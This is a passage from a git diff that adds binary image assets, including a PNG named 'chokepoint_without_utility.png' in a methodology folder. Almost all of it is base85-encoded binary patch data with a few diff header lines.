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
O(Ya-KvrOIb>Hh;i#{hl+

literal 0
HcmV?d00001

diff --git a/src/assets/methodology/chokepoint_without_utility.png b/src/assets/methodology/chokepoint_without_utility.png
new file mode 100644
index 0000000000000000000000000000000000000000..627cad32f7baf205881b02510f932af58735b95d
GIT binary patch
literal 248497
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
